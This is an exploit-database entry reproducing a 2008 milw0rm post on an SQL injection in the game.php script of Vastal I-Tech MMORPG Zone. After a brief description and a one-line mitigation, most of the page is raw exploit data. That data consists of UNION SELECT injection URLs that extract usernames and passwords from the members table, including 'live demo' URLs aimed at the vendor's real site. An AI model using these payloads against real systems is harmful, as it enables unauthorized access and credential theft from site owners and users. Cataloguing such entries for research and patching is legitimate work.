header-logo
Suggest Exploit
vendor:
MMORPG Zone
by:
Stack
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MMORPG Zone
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Vastal I-Tech MMORPG Zone SQL Injection Vulnerability

The exploit takes advantage of the lack of input validation in the game.php script to inject a malicious SQL query. The malicious query is used to extract the password and username from the members table. The exploit can be triggered by sending a specially crafted HTTP request to the vulnerable script.

Mitigation:

Input validation should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#######################################################
#  Vastal I-Tech MMORPG Zone SQL Injection Vulnerability
#
# Author   : Stack
#
#
# Script Home Page : http://www.vastal.com/mmorpg-zone-sell-mmorpg-online.html
#
# Demo      : http://www.vastal.com/games/
#######################################################
the exploit fate the password
use ur mind for have the column username
Exploit:
http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
 
Live Demo

http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*

# milw0rm.com [2008-09-05]